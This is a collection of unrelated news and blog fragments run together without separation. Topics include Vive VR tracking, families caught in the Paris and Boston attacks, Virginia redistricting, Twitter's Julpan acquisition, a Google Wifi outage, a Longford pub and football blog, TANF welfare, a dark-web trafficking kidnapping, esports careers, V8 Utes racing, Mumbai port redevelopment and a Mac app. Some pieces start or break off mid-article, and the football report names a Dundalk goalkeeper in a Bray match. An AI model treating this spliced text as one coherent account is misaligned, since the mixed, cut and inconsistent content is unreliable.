What does this mean for Vive VR users and potential customers ? With the virtual reality system 's tracking technology open sourced , third-party companies would be able to create devices and accessories to support the virtual reality experience such as special edition controllers and full bodysuits .
In the long term , the move would allow virtual reality hardware companies to leverage their products onto the SteamVR tracking technology , instead of requiring them to create their own systems from scratch . Valve and HTC could also be able to establish a standard for motion tracking for virtual reality , which could apply not just to the video game industry but to a wider range of applications .
With the open sourced Vive VR tracking technology , along with the Vive X Accelerator program which looks to support startups , the future of virtual reality does indeed look bright .
ⓒ 2018 TECHTIMES.com All rights reserved . Do not reproduce without permission .
In total , almost 130 were killed and hundreds more injured .
When Jaclyn first heard of the attacks , she tried contacting her parents but could n't get through . After about 15 to 20 minutes , she received a text from the Airbnb rep they were having dinner with , letting her know they were OK. She did not hear from them again for hours .
They stayed in the restaurant until roughly 3 a.m. Uber cars were arranged and took them to their hotel . The Sagolilis were then able to send a message via Facebook to their daughter telling her they were all right .
The Sagolilis were told to stay inside until the morning . But around noon on Saturday , Nelson walked around the block “ and everything seemed normal . That 's why I went ahead with the Lourdes ' trip . The Metro and trains were running , ” he wrote in his text .
Jaclyn said she now understands how her family felt in 2013 .
Her husband Ricardo crossed the finish line of the Boston Marathon at 3:10 . The first bomb went off around the four-hour mark of the race .
The Stouffville resident and his family were getting some lunch in the Prudential Center 's food court , which was next door to the finish line , when the first bomb went off , Ricardo told The Sun-Tribune just days after the race .
When the second one detonated 12 seconds later , people started hiding under tables and rushing for the exits .
The crowd pulled Ricardo towards the building 's Boylston Street door . He had to turn around to find his family , who were hiding by a restaurant .
They immediately left the building and walked about two hours to their car , which was in Cambridge . The subways were shut down .
When Jaclyn 's four-year-old daughter Jennette , who was in Boston , heard about the Paris attacks and that people were dead “ ( she ) looked at me and said Lolo is in Paris . Is he one of the dead . Did he die ? ”
Lolo is Philippine for grandfather .
“ Because of Boston , they are aware of these terrorist attacks , ” she said .
Jaclyn said her parents were expected home Wednesday , which was their original return date .
– With files from Torstar News Service
Groups calling for redistricting reform in Virginia were emboldened Monday by a U.S. Supreme Court decision upholding reforms in Arizona , but changes to Virginia 's system remain a political long shot in the near term .
In a 5-4 decision , the high court said that a commission empowered by Arizona voters can keep drawing election districts there . The state legislature had sued , arguing that the 2000 ballot measure unconstitutionally ceded the legislature 's authority to the commission .
Virginia does n't have Arizona 's voter referendum rules , but reform proponents have pushed to change the Virginia state constitution before the next scheduled redrawing , in 2021 . They say they want to take partisan politics out of the process as much as possible .
The court could have short-circuited that by declaring redistricting a legislative-only power ; one that could n't be delegated , much like taxing authority , according to Greg Lucyk , president of OneVirginia2021 , which has pushed for reform .
`` It 's a victory for the principle , '' Lucyk said .
A number of proposals have been made in Virginia , generally ceding authority to an appointed commission or to legislative staffers . The General Assembly itself would typically take a final vote on plans drawn without its input .
The state Senate has supported some efforts in recent years , but they 've been dead on arrival in the House of Delegates . For example : Bills from state Sen. John Miller , D-Newport News , to hold a non-binding referendum to gauge voter support passed the state Senate on lopsided votes two years running , only to be tabled in a House subcommittee .
The General Assembly draws state House and Senate maps now , and it approves congressional maps drawn with input from the congressional delegation . Computer software allows mapmakers for the majority party — Republicans , currently — to go precinct by precinct , knowing voters ' habits , and drawing districts all but guaranteed to elect a Republican or Democrat .
The process has sparked a number of lawsuits throughout the years , including two ongoing now to challenge various House of Delegates districts and the 3rd Congressional District .
The Supreme Court 's decision on Monday makes it clear that an independent commission could be used `` instead of leaving it in the hands of politicians who possess a major conflict of interest , '' Lucyk said in a statement .
ProgressVA , a left-leaning group that has also supported reform , and the Democratic Party of Virginia on Monday both called on the Republican majority in the House of Delegates to support reforms .
A spokesman for Speaker of the House William Howell said the majority continues to feel the state 's redistricting process is appropriate .
Fain can be reached by phone at 757-525-1759 .
Twitter announced Wednesday it has acquired Julpan , a New York City-based startup that analyzes real-time data collected from blogs , Tweets , status updates and news sources . Financial terms of the deal have not been disclosed .
Advertisement
The Julpan deal is just the latest in a series of moves Twitter has made in recent months to develop its in-house ability to analyze the huge amounts of data that flow through its service . Last month , Twitter announced that it now sees more than 200 million Tweets posted on a daily basis .
There is also an acqui-hire element to the Julpan acquisition . Julpan is headed up by Ori Allon , a computer scientist who developed a text search algorithm that Google acquired the rights to in 2006 . In 2009 , Google had incorporated the algorithm dubbed “ Orion. ” Allon left Google in 2010 to found Julpan and serve as its CEO . According to Julpan 's staff page , there are now 15 employees at the company .
It 's unclear what caused the problem because no update went out today , but judging by reports , running through setup again is enough to get most people back up and running . Some owners with mesh networks are reporting that only one of their devices ever went offline , while there are others who are still disconnected even after a hard reset . Of course , for those with any kind of custom settings that could cause quite a headache . We 've contacted Google about the issue and will update this post when we receive a response .
Update : The Wifi Care Team has posted again on the forum , and says that it will require a hard reset for affected users to get back online . Unfortunately , it appears these devices do n't have the capability to backup their settings , so owners will have to redo any customizations .
On a special support page for the incident , it has specific instructions for varying situations , and claims the problem occurred because of an issue with the Google Accounts engine .
Google :
Next game in our LOI round Ireland extravaganza was to the bad lands of Ireland , the Midlands , Longford , to see Longford town play Bray Wanderers . Since I do n't live that far away , I have seen De Town play a few times , so this was n't a new one for me at all .
Longford ( An Longfort ) is a smallish town , with a population of about 9600 in the centre of Ireland in the county of Longford , easily accessible from Dublin and beyond by train , bus and road . The town is most known for its St Mel 's Cathedral dominating the skyline of the metropolis . And a certain famous Mr. Gibson was called after the Cathedral , his mother hailing from the town .
The town has seen better days , and one could argue that the recent upturn in the economy has yet to fully trickle down to Longford , but the town certainly has a lot of characters , and It 's still better than Athlone !
Pub watch
Andy Byrne 's Pub , Longford
Facebook
First pub ventured into was Andy Byrne 's Pub , a good mid-day crowd in , watching the horse racing and the early afternoon football on the box , good bit of banter from the bar man , decent atmosphere and noticed that they had St Mel 's Pale Ale on tap . St Mel 's , of course , the local brewery that has proved a bit of a hit in the midlands and beyond . Good pint in great surroundings , enjoyed my brief time here . Recommended .
Kavanagh 's Bar , Longford
Address : Earl St , Longford
Facebook
The next beer was in Kavanagh 's Bar , which had a bit of life in it , had a nice long bar to spend the time in good company . Looked like a decent boozer , and had a good atmosphere for that time of day , just buzzing along .
Kane 's Bar , Longford
Address : 27 Ballymahon St , Longford
Kane 's Bar had some strange frontage , doubling up as a travel agency , and easy enough to pass by if in search of a pub . Not really a whole lot happening in this bar , was very dead . Got another St Mels beer , and left not long after that .
Roy 's Bar , Longford
Facebook
Do n't really know what to make of this bar . Certainly was one of the weirdest bars I have drank in for a long time . Was so mad I did two stints in the pub , before and after the game , just to check to see if my senses were not playing tricks on me .
Great location , and looked decent from the outside , not too bad inside either , nice décor alright . Having the beers and a bit of a chat with the bar girl , all good fun . Bar manager starts shouting at his punters , not sure if this was some kind of “ Longford style banter ” . One fella left due to it , shouted out the door . Either way it was n't my business .
He eventually tells the bar lady to go home , she was n't needed for the day . A bit of a shock not just for her , but for us as well , as she was a good bar lady , chatty and fun , and there was a Saturday trade building up .
Had two pints , which were fine .
Returned later , place was busy . But for a small bar , with a mixed crowd in , the music was tuned to the last , hard dance blasting out which was kind of out of place for the crowd that was in it and the setting .
And that was n't the end of it . The bar manager decides to start mopping the floor in a busy bar for no apparent reason . Getting in the way of people trying to have a drink . Was funny anyway , what I can I say . Must be a Longford thing . Lol
J P Reilly 's Bar Longford
Facebook
Richmond Street , Longford
Pre match pints were to be in J P Reilly 's Bar , where Section O , the Longford supporters group , managed to get a really good deal , all pints for three euros , and a free bus to the ground . Top job .
Nice bar , very good bar man who was quite friendly , played a few games of pool on a very dodgy table , was a good bar to sink a few good pints before the game , Enjoyed it .
Longford Town F.C .
Arena/Stadium : City Calling Stadium , Longford ,
Location : Strokestown Road , Longford
Manager : Tony Cousins
Founded : 1924
Leagues : League of Ireland Premier Division
Club home page
ltfc1924 @ gmail.com
Facebook
Twitter
Longford Town or , as the locals lovingly call the team , “ De town ” , play in the LOI Premier Division . The club play their home matches at the imaginatively titled ‘ City Calling Stadium ' , which has a capacity of about 7,000 , and are usually decked out in red and black .
Founded way back in 1924 , the club were only elected into the league of Ireland in 1984 , 60 years later ! A history of not much happening , usually a low feeder team at the bottom of the first division . That was until a certain Stephen Kenny took the reins of the club in 1998 . Kenny was an unknown , having virtually no playing career to speak of ( just 4 games for Home farm ) and at just 27 , it was a gamble I guess a team like Longford , with no real expectations , could afford to make . His three season stint at the club transformed the club , as they won promotion to the League of Ireland Premier Division , reached an FAI Cup final for the first time ( losing out to Bohemians ) , and subsequently , qualifying for Europe in the Uefa Cup , another first for the club . Leaving in 2001 , he did n't win anything but there can be no doubt he laid the foundations for what was to come .
Taking up the reins from Kenny was Alan Mathews , a Dub who had made over 80 appearances for the club . Again another novice manager thrown in at the deep end , but he eventually became the most successful manager in Longford Town 's history , delivering their first senior trophy , the 2003 FAI Cup ( a 2–0 win over St. Patrick 's ) and retaining it the following year , winning a cup double of the FAI Cup and League Cup .
The club will be particularly remembered for a quite simply awful fuck up in the Uefa Cup , 3-1 up in the tie and with an away goal away to the mighty Carmarthen Town , they let in four soft goals in the second half to exit Europe 5-3 !
Relegation in 2007 to the first , was a disappointment as they struggled there for 6 barren years before returning to the top league last season , finishing in a very decent sixth place .
Playing out of the City Calling Stadium , what was for a long time called Flancare park , built in 1924 but getting a major face lift in 2001 the stadium today can hold about just under 7000 , all seated . The club though struggle to get fans out there as the stadium is not in the town and located three miles just west of Longford town centre .
LongfordTown 1 – 1 Bray Wanderers
Attendance : 700
This game was pretty much ninety minutes of pure boredom , offered up by both teams in a wet and cold night . I had brought a friend who hates football , his first time at a LOI game . I think he hates football even more now !
As far as I could tell there were only about two shots on target in the first half alone
Second half Bray came out a little stronger , with the wingback Douglas catching my eye , but I am not sure if that 's because of his striking read hair , but anyway they finally got the first goal when Dean Kelly scored shooting from inside the box to put it past Skinner in the Longford goals .
I did get to see a laughable goal though . The Dundalk net minder , Cherrie , a goalie I have long been a fan of , totally made a hame of a back pass , kicking the ball off the body of David O ' Sullivan , who I am not so sure knew too much about it . It rebounded high over the goalkeepers head , straight back into the empty net . Comical !
Late on Longford 's O'Connor was sent off for a bit of a rash tackle on Creevy , but Bray did n't really capitalize with the extra man and the game eventually fizzled out for a dour draw .
Interview with Kieran from “ Section O ” , Longford Supporters Group , and who also runs his own brilliant blog “ Between the Stripes ” on all things Longford Town FC , well worth checking out……
Section O Facebook
Between the Stripes Facebook
So what 's your name ?
Kieran Burke
And Section o ?
Yes , Section o , we are going for our 15th year now , since 2001 the group was set up , I have n't always been over to that side of the ground myself but 15 years overall now so…
And why Longford Town , why the LOI ?
Kind of strange actually because I was born in England myself , but I am Irish , my family is Irish , so we moved here in 2003 and Jesus I thought when moved here I thought it was fantastic that the local area had its own football team and I thought Jesus this is something I can really get behind . Went to my first game in 2003 , think it was a league game at home against cork city , I think we lost but , ever since then I have always been passionate about the town and heavily involved with it the last few years
What got you into section o , what was the setting up of that ?
Well section o kind of went away for a few years , there were always a few lads that stuck loyal to it but when we were in the first division they were dark days , the attendances were poor , and there was n't many sticking to it but then for I think it was for 2013 or even 2012 when we were making a push for the first division title one of the lads said maybe we can get this going again and made a big push to get as many people over to that side of the ground as possible , ever since then I have been hooked , I just love the whole atmosphere to it .
Since you have been following them , what has been the best season , the highlight for you ?
It has to be 2014 winning the first division , three days in a row out celebrating after that it was absolutely fantastic . It 's hard to know whether anything like that will be matched again but even if we got relegated and people say it would be great if we went down and won it again , but it would never be the same again , seven years in the first division struggling to get back and finally doing it , so that definitely
What do you think of tonight 's game anyway , it was a 1 all draw with Bray ?
Am I allowed to swear on this ?
Yeah of course , ha , it 's a drinking website you can say whatever you want to say !
My eyes are bleeding after that game , that was absolutely SHITE
It was pretty even though ?
Pretty even because both teams were absolute dross . I have never seen so much long ball played in my life…I do n't know what type of shape the team is playing in … . It 's going to be a long season I think…
So what do you think about 2016 then , what would be considered a good season ?
Oh anything about 10th place I will be celebrating like a league title because I do n't think compared to last year 's squad….I do n't think it 's there at all
So what players….I know its 4 games in , but what players should we look out for Longford anyway ?
Kevin O'Connor definitely , he is getting on a bit now , but he still is only 30 , still young enough in LOI terms but he is just a fantastic midfield player , so good on the ball , he was n't great tonight , but I do n't think he is fully fit , injured last week , so maybe not fully back at it , Josh O'Hanlon is on loan from England , from Bournemouth , so he should pick up as the season goes on and then Jamie Mulhall is a very talented player
So just a question . Rivals , it must be Athlone town
Athlone town , yeah that 's a big rivalry , a lot of people do n't think it when they talk about LOI rivalries , they talk of Shelbourne , or they talk about Bohs-Rovers …but when the two teams are going well , which is n't that often , but when the two teams are going well and when a derby game comes up .. there is n't an atmosphere like it , its unbelievable…
Is it hard to get people out to the Town ,
Yeah its very hard
Ye guys I thought were pretty impressive tonight , you made an effort
We made an effort , I suppose the numbers were n't great , but we did make a lot of noise , you can probably tell from my voice but we are trying again to get another big push on this year and try to get people out to games but it really is n't easy especially when the team is n't as going as well as people might have hoped … .. its not easy so… .
So that was Longford . A bit of a strange one alright . Longford is a town that is just getting by , silently doing its own thing in the middle of Ireland . If WW3 started tomorrow , dare i say Longford would n't take notice , or be affected too much . Keep on keeping on…… .
As much as I really admire Kieran and what he and the boyz in section O are doing , and with a bit of unnecessary hostility from the Longford FC board too , but sorry to say I did back Longford pre season to be relegated at 11/2 . Just figured replacing an already threadbare team with a lot of youngsters is a tough ask .
A bit trippy but fuck it i was bored !
Use Facebook to Comment on this Post
Share this : Twitter
Facebook
Reddit
Pinterest
Tumblr
Sign-up for the Urban Milwaukee daily email
The welfare reform blocks grant program known as Temporary Assistance for Needy Families ( TANF ) turns 20 on August 22nd , and that anniversary is not a cause for celebration among advocates for low-income families . Some conservatives have also criticized it , such as Peter Germanis , who wrote that TANF “ has failed to provide an adequate safety net or an effective welfare-to-work program . ”
The block grant gives states a lot more flexibility , but also significantly less funding and a lot less accountability , and the result has been a sharp decline in support for the families that the federal funds are supposed to assist . The following graph illustrates that the number of Wisconsin families who are receiving direct cash assistance – either for child-only cases or for participation in work programs under Wisconsin Works ( W-2 ) – has dropped to a monthly average of less than 18,700 this year . That is less than one-fourth of what the comparable caseload had been under Aid to Families with Dependent Children ( AFDC ) in the early 1990s .
The sharp drop in the number of needy families who are receiving direct cash assistance is not because the need has subsided . An analysis by the Center on Budget and Policy Priorities ( CBPP ) , found that only 26 % of Wisconsin families below the poverty level were getting direct TANF assistance in 2013/14 , compared to the 96 % of families in poverty who received assistance from AFDC in 1994/95 .
Another CBPP analysis examined the number of children in deep poverty in 1995 ( the year before TANF 's enactment ) and in 2005 . Those years were chosen because they had similar unemployment rates and were both in the fourth year of an economic recovery . They found that the share of children in “ deep poverty ” – below half the poverty line – rose from 2.1 % in 1995 to 3.0 % in 2005 .
There are many reasons why TANF has not been a successful anti-poverty program , but I think these are the primary factors :
The funding level has been frozen since TANF was created , and the fixed appropriation level has lost 35 percent of its value over that 20-year period .
Much of the funding is being spent for administration rather than direct assistance .
States are able to use TANF funds in ways that supplant money the state had had previously spent from its own coffers , as illustrated by Wisconsin 's use of TANF funds to reduce state support for the Earned Income Tax Credit .
This sort of TANF criticism does n't only come from liberals . A very frequent and knowledgeable critic has been Germanis , who worked in the White House under both President Ronald Reagan and President George H. W. Bush . Now a private citizen who writes often about welfare reform issues , Germanis ' resume also includes stints working on welfare issues for the American Enterprise Institute and the Heritage Foundation . In a January 2016 paper titled “ The Need for Common-Sense Conservative Welfare Reform , ” he wrote :
“ TANF is not ‘ welfare reform ' at all , but a fixed and flexible funding stream that has failed to provide an adequate safety net or an effective welfare-to-work program . In many states , it has become a slush fund used to supplant state spending and fill budget holes . ”
In a May 29th document , Germanis described TANF as “ a blank check to states with no accountability . ”
Nevertheless , some conservatives consider TANF to be a success . Speaker Paul Ryan and a number of other Republican lawmakers want to use it as a model for changing Medicaid into a block grant to states , rather than an entitlement program .
Analysis of the actual track record of TANF shows substantial flaws and points to many ways that the law could be improved . A new report by CBPP contains a number of good recommendations for addressing TANF 's failures . But the most important lesson is that TANF should not be used as a model for changes to critical safety net programs like Medicaid and Food Share .
As Germanis wrote this week about the Task Force Report offered by Speaker Ryan and a number of other Republican lawmakers , “ it would not solve problems , it would add to them . ”
Italian prosecutors are currently investigating a group known as Black Death , which operates on the dark web , after a man claiming to be part of the organisation kidnapped an English model in Milan and tried to sell her online for €300,000 ( £270,710 ; $ 353,223 ) in bitcoin .
The suspect – identified as Lukasz Pawel Herba , a British-citizen of Polish descent – is believed to have lured the girl with a fake modelling advert .
She was allegedly assaulted , drugged with ketamine , and handcuffed . She was then taken to a farmhouse in the village of Borgial di Lemie , Turin , where Herba allegedly held her hostage for six days in July .
The man eventually freed her and took her to the British Consulate in Milan after failing to sell her online . Italian police arrested him and charged him for kidnapping for ransom .
It is not clear why the girl was released .
She has since spoken about the incident , and said Herba told her he had earned €15 million over five years of selling women , many of whom were destined for Arab countries .
Italian newspaper Corriere della Sera reported the woman – whose identity was not disclosed – was told she could be freed if a ransom of €50,000 ( £45,000 , $ 58,000 ) was paid .
Authorities in Italy , Poland and Great Britain are investigating the case . They believe no ransom was paid for the release of the girl , news agency Ansa reported .
Some reports claimed the model was freed after the abductors discovered she had a two-year-old child , something which goes against the groups ' rules that prevent kidnapping mothers .
It is not clear whether Herba was really part of the organisation . However , authorities found a note linked to the Black Death , in which the group explained it was releasing the girl due to its `` huge generosity '' and her state of being a mother .
The model was told not to inform authorities and talk `` about us in bad language and without respect '' .
What is the Black Death group ?
While searching Herba 's properties in Milan and Turin , Italian police found a note in which the group explained how and why it abducts women .
`` All our girls are set for actions only and are held in Europe . If you wish , we can kidnap a specific target for your needs . Service will be rather expensive , especially for targets outside Europe , '' read the note .
The group went on to explain it provides the abductees ' details – including age , height and weight and whether they have any sexually transmitted diseases – in the profiles it creates when they sell the girls on the dark web .
`` Girls can be transported globally , we have contractors for that . EU delivery is free of charge , '' the note continued .
`` Should this be your first action , you will have to be able to prove you know someone who previously dealt with us . ''
The dark web is a section of the internet where people can engage with each other anonymously . It is often used for illicit activities , including human trafficking , prostitution and sales of weapons and drugs .
Little is known about the Black Death . It is is not clear whether the organisation actually exists , or if it is an online scam .
Italian news site Corriere said Europe police , Europol , has a file on the group , but its existence has not been proven yet .
Vice journalist Joseph Cox investigated on the group in 2015 . He engaged with someone thought to be linked to the group and pretended to be a potential customer interested in the services provided by the organisation .
Cox pretended to be interested in buying a trafficked girl whose profile had been put online . It later emerged the advert was fake and the image of the blonde girl – pictured half naked and with her arms tied behind her back – had been taken from a porn website .
`` I found Black Death after a link was posted on Reddit . 'Apparently they 're an organized crime group that deals in nearly anything , you name it , ' the post read , '' Cox explained .
`` After having landed on the site , users are met with a cornucopia of different services : weapons , drugs , bombings , assassinations , new identities , and trafficking . A feed of news updates apparently stretching back years is also listed , '' he said .
`` 'Do not contact us just to ask questions , ' the site continued . I decided to pose as a potential customer to see what I could learn about these so-called dark web human traffickers .
After expressing his interest in the girl and requesting more photos , he received an email by the owner of the site , asking him how he had come to know about the organisation .
`` After keeping the conversation going through emails , I was eventually given a list of detailed instructions for the auction . I was required to pay an upfront deposit to view a livestream of the girls . I asked to be let in at no cost , but this was denied , '' Cox explained .
At the time , experts told Cox they had doubts about whether the site was legitimate and believed the photos uploaded on it were `` probably staged . ''
Ultimately , the journalist concluded it was not possible to ascertain whether the group existed or not as more information was needed .
How can I become a pro gamer ?
This is a question many players likely ask themselves on a daily basis . Many of them play everyday , watch streams and videos just to get better in order to achieve their dream of one day playing against their idols . The growth of esports is undeniable at this point and millions of people play competitive games on a daily basis , many kids aspire to go pro as they grow up . Games and esports itself are becoming more accessible for children to play or watch . The amount of people wanting to go pro rises with it .
However , only the top 5 % will get a shot at the experience of becoming a pro .
Therefore , we decided to explore the backgrounds of some of the professionals in the scene , how they got where they are and how their lives changed in the process .
* * *
`` I almost gave up everything due to fear . ''
The most frequent question I get when I turn on the stream are “ How do I become a coach ” or “ How do I become a pro player ” . Most players do n't look for the process . Most of the time they are looking for the shortcuts , the fastest way to climb and be on top of the competitive ladder . What those players tend to forget is the sacrifices people have done in order to be a Challenger level player in League of Legends so they can become a pro one day .
We 've all heard the stories of Yiliang “ Doublelift ” Peng getting kicked out of his parents house as he tried to go pro or that Soren “ Bjergsen ” Bjerg experienced a lot of bullying for most of his time in school . However we barely glimpse an eye in the way many pros started and how their lives changed in the process .
Technically speaking all you need to become a pro player is a good computer , a good internet connection , time and some skills , but how was the transition for talented players into the professional scene ?
Photo : Riot Games
“ I never wanted to be a pro player . It just happened as a side effect of not liking university , ” says Alberto “ Crumbz ” Rengif , former pro player for Team Dignitas and now shoutcaster for SPOTV .
“ My first pro experience was in IPL3 in Atlantic City . The tournament was held inside a casino so only people 18+ could participate . Salce , a member of Epik Gamer , an attending team , was underage so I was contacted by Rinoa ( former Rioter ) if I could fill in for the tournament , all expenses paid and I could make money . They spoke to me since I was the first available person on the ladder that was n't already on a team and over 18 . I was fascinated with the idea that I could make money by playing video games . “
`` I knew I would regret for the rest of my life if I did n't try to go pro . ''
Crumbz entered the scene in 2011 , a time before the conception of LCS when you had to qualify to play tournaments . It was an open circuit system that we know today from esports like CS : GO . Players were n't salaries and most of the active ones during that time earned their money from prize pools . If you were lucky , you had an organization with some kind of sponsorship backing you up .
Understandably , it was n't that easy to convince your parents to follow this path and for younger players that barely finished high school or want to quit college to play League of Legends this is a big deal .
“ They were n't happy but came around to learn about it and now they support it . It 's always a shock to hear your son wants to drop out of a great university to play fantasy video games somewhere far away , ” says Crumbz about his family reaction when he decided to follow his career as a pro player .
It 's even harder for South Americans to justify it to their parents due the cultural aspect that families tend to stick together and live closer to each other . Brazilian pro player for Pro Gaming Esports Matheus `` Professor '' Leirião had a similar experience .
“ The first time I spoke with my parents about going pro in League of Legends was troubled , mostly with my dad since he really did n't want to accept it at first . He even threatened to drop his monetary support for me and my mother . I almost gave up everything due to fear . ”
Photo by : Riot Games
Parents in Brazil are very protective towards their children , which explains the reaction of Professor 's father . People value education as the most important priority in Brazil since it is privilege and not a given to have access to a good education in the country . However , Brazilians are also passionate and even more so when it comes to sport . Through esports , Professor 's story would eventually find a happy ending in more than one way .
The support player that plays today in the biggest League in Brazil ( CBLOL ) grew up with his parents being divorced and he had a lot of troubles with them since he did n't have the best grades in school . His excitement and determination to explore the world of esports lead him the way to his first pro experience . Shortly after , he switched from AD carry to the support role that made him famous for his screaming and talkative persona in game .
“ I took the challenge , since I knew I would regret for the rest of my life if I did n't try to go pro . My first pro experience was in 2015 when I played the relegation with Keyd Warriors ( which would become G3X later on ) . To be completely honest , I did n't have a clue what I was doing doing , but I was amazed by it and it was the first time I 've ever felt happy for something I had done in my life . ”
`` My relationship with my father changed completely after all this . ''
Everything changed when Professor entered the CBLOL . Not only did he get the chance to pursue playing full time , but also his relationship with his parents changed at home .
“ My mother was always supportive . All she asked me was if I will go back to university one day . My relationship with my father changed completely after all this . We have never been extremely close together , since he lived in different cities for the most part of my life . So we never really talked a lot and the only thing he ever demanded from me was to have good grades in school .
However , he started following all my games since I qualified for the CBLOL and it helped our relationship a lot and we got a lot closer . Now it feels that we are always on the same page even if we do n't talk as much . So I 'm much happier and everything is okay . ”
While Professors relationship got better with Parents , Crumbz tells that his relationship with his family remained healthy throughout the whole career .
“ Luckily , gaming did n't change my relationship with my parents . Moving away from home at a young age did . We 're close and talk often as well as visit often . In South America , family is highly valued . ”
Photo by : Riot Games
The longevity of both players ' careers is proof that they not only learned the game , but also the process of graduating from your typical solo queue player into a professional . The latter comes with learning many more aspects . Since you do n't get educated on how to work in the business , most players have to learn it by themselves and mostly from their mistakes .
“ If I was in the same situation today I would slap my old self in the face and tell him to wake up and start truly making the most of what is in front of him . I would educate myself on business and the way the world works so that I would have avoided getting taken advantage of , as well as losing money , effort and brain cells. ” reflects Crumbz after he retired from his professional gaming career which in turn led to him creating the Agency for Professional Esports to help players become more educated in business and also represent them .
“ If I was in the same situation today I would slap my old self in the face and tell him to wake up . ''
Even Professor regrets a few opportunities he left behind in the past .
“ I think if there was something I would change in my career is that I did n't take an offer of INTZ in 2015 when Revolta left for Keyd Stars . Otherwise I 'm thankful I did n't take it because I could have missed out on learning and growing up a lot . I 'm pretty happy and would n't change anything other than this . I 've learned to give my best at all times and learned a lot as a person , I 'm evolving , I 'm happy with the way things are . “
Professor is currently at the third place with his team Pro Gaming Esports in the regular phase of the CBLOL and is aiming to fight for a spot at worlds .
Besides all the hours of practicing , all the effort and the dedication they put into mastering the game and reaching the top of their game has its difficulties . However , with determination players motivate themselves to keep fighting and sacrificing everything in order to reach their goal , the dream of becoming a pro player . We often tend to forget how much those players left behind to live their dreams .
V8 Supercars has completed a deal with CAMS to take over the running of the V8 Ute Racing Series for the remainder of the 2016 season .
The category ran at last weekend 's Clipsal 500 Adelaide with V8 Supercars acting as ‘ caretakers ' following the pre-season demise of Australian V8 Ute Racing Pty Ltd .
The Ute Racing company , which contracted Spherix to administer the category , was put into voluntary administration as franchise holders looked to exit the series .
V8 Supercars has now confirmed that the Utes will complete their full eight round schedule following the new CAMS agreement .
“ We have made no secret of our desire to manage the category long-term , ” said V8 Supercars CEO James Warburton after 17 Utes took to the track in Adelaide .
“ It 's been a very professionally run series for many years and we are keen to develop it in a new direction and ensure its continued success for years to come .
“ The V8 Utes provide an action-packed , high-octane brand of racing that aligns perfectly with our core brand principles .
“ It 's a great fit , and a fantastic support category loved by fans nationwide . ”
CAMS CEO Eugene Arocca says he 's pleased V8 Supercars has taken control of the category and is confident the group will devise a concept to safeguard its future .
Competitor uncertainty surrounding the direction of the series led to the exit of several teams ahead of the new season .
Last year V8 Utes joined forces with V8 Supercars to devise a next generation Ute to replace the current Holden and Ford models , but a firm resolution is yet to be found .
“ Our arrangement with V8 Supercars is that they will put 2016 away which is what they committed to and then will look for a longer term engagement , ” Arroca told Speedcafe.com .
“ We believe it is a great category and we want to see it continue to evolve give the Holden/Ford situation we are facing .
“ We are extremely happy that V8s have stepped in and we will be talking to them about 2017 and beyond .
“ Discussions at the moment are about making sure the category gets through to the end of 2016 and during the course of the year I am confident James Warburton and Shane Howard will look at how they can evolve the Utes category for the future . ”
The V8 Utes will head to Symmons Plains for the second round of the series from April 1-3 .
If the Rani Jadhav committee has its way , the eastern coast – from CST to Wadala – is going to be the future – at least Mumbai 's .
The committee , set up by the central government in July 2014 , to find out ways in which the 1,781 acres of Mumbai Port Trust land can be developed , has submitted a 24-page report .
The ambitious report , if implemented , will convert the eastern coast into an international tourist hotspot .
Out of the 1,781 acres , 1018 can be redeveloped by changing the current land use policy , suggests the report . The redevelopment will be done under the title of re-branding Mumbai 's eastern waterfront – Open , Connected and Green .
As per the report , 30 % port trust land will be used for the open spaces , 25 % for road transport , 40 % for mixed development and 5 % for social amenities .
The report also suggested 2-3 marinas , helipads , recreation and tourism facilities , cruise terminals of international standards , sea world , aquarium , water sports , floating restaurants , flamingo observation decks , wetland parks and bird sanctuaries .
The plan also envisages cultural centres and amphitheaters . It will also have heritage trail for tourists .
The report also calls for the development of entrepreneurship promotion zones in the eastern coast . To this effect , it suggested strengthening fishing and fish-based industrial activities .
Are there no constraints ? There are . The report does list some of them . Prime among them are vacant land being scattered in small pockets , scattered port operations , tenancy and large pockets of slums . Slum removal , it said , will pose a problem .
How is transport development planned ? In order to provide an efficient mode of transport , the report said connecting Metro- IV to the coast was essential . `` A dedicated Rapid Bus Transport Facility corridor need to be developed . It should have non-motorised , pedestrian-friendly cycle tracks and inter-modal transport terminals . Emergency services also should be developed , '' the report suggested .
What about commercial space ? There will be space for commercial offices and retail markets , so that people can enjoy the shopping experience at the water front . The commercial space will have international finance and exhibition centres , besides studios and luxury hotels .
Is it very ambitious ? `` People coming to this area should not face any problem . It 's going to be an international destination , '' said one of the trustees of MbPT . `` We want seamless local , regional and national accessibility to the area . That 's why are offering multiple mode of transport – road services , metro , rail , water transit , cycle tracks etc .
Where are boat jetties planned ? Passenger water transportation terminals need to be constructed at Radio Club , Ferry Wharf , Haji Bunder , and Nariman Point . The committee suggests long-term , flexible and adaptable transport facilities . The CST to Panvel elevated train corridor also needs to be developed , besides widening the P.D Mello road and north-south connections .
What 's the Port Trust saying ? Officials say this plan will be environment-friendly . `` We will allow only non-polluting industries . It will be an eco-sensitive zone . If the suggestions of the report gets implemented , it will redefine Mumbai 's shoreline . It will revive Mumbai totally and fetch a lot of revenue , '' said an officer .
What are the land policy hurdles ? As per MPT Act , 1963 , non-port activities are not allowed on port land . Coastal regulation zone norms too will have to be amended as construction will have to take place within 500 metres from the seashore . Relocation of farms from Haji Bunder and Mallet Bunder to salt pan land , and fast-track courts will also be required . Whether the land should be disposed of like mill lands where the state and BMC will get their share will also have to be decided .
My college English teacher said I should try to learn and use a new word every day . That was a lofty goal then , and it 's more difficult today .
Putting a little math into the new-word-a-day equation would mean I have another 5,000 words at my disposal . English has perhaps more than half-a-million words , but the average person has command of barely 10,000 ( if that ) .
Well , to carry on that lofty goal here 's my new word for the day , just for you , dear Mac user .
Yoink .
Yikes ! What does Yoink mean ? Well , this odd sounding word is the name of a new way to drag and drop on your Mac . The Yoink app creates a little pop out shelf on the side of the Mac 's screen so you can drag and drop a file there and leave it there– until you find a place to drop it .
Think of Yoink as a visual way to drag and hold , the drag and drop files .
See the little shelf on the left side of the Mac 's screen in the image above ? That 's what Yoink does . Drag a file– document , photo , image , whatever– onto the shelf . You can even drag it directly from an open app .
The file sits in the Yoink shelf until you find exactly where you want to drop it . Then , once you found the folder in the Finder or another app , drag the file off the Yoink shelf to wherever it needs to go .
Yoink does n't cost much but for Mac users who drag files around it can be quite helpful and it 's actually easier than using the Finder in OS X Mavericks with multiple tabs in Column view .
“ We need to live , do not impoverish us , ” reads a banner hanging over Gang Dolly put up by the Sex Workers ' Front ( FPL ) in protest to the closure . All photos by Arman Dzidzovic
